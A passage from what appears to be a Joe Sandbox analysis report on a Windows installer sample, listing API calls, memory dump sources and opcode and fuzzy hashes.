                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                  Strings
                                                                                                                  • Error launching installer, xrefs: 004059E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                  • String ID: Error launching installer
                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                  • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                  • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                  • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                  • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                  • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                  • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                  • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                  • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                  • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                  • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                  • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                  • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                  • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                  • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                  • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                  • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                  • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                  • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                  • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                  • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                  • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                  • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                  • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                  • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                  • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190613189-0
                                                                                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                  • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                  • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98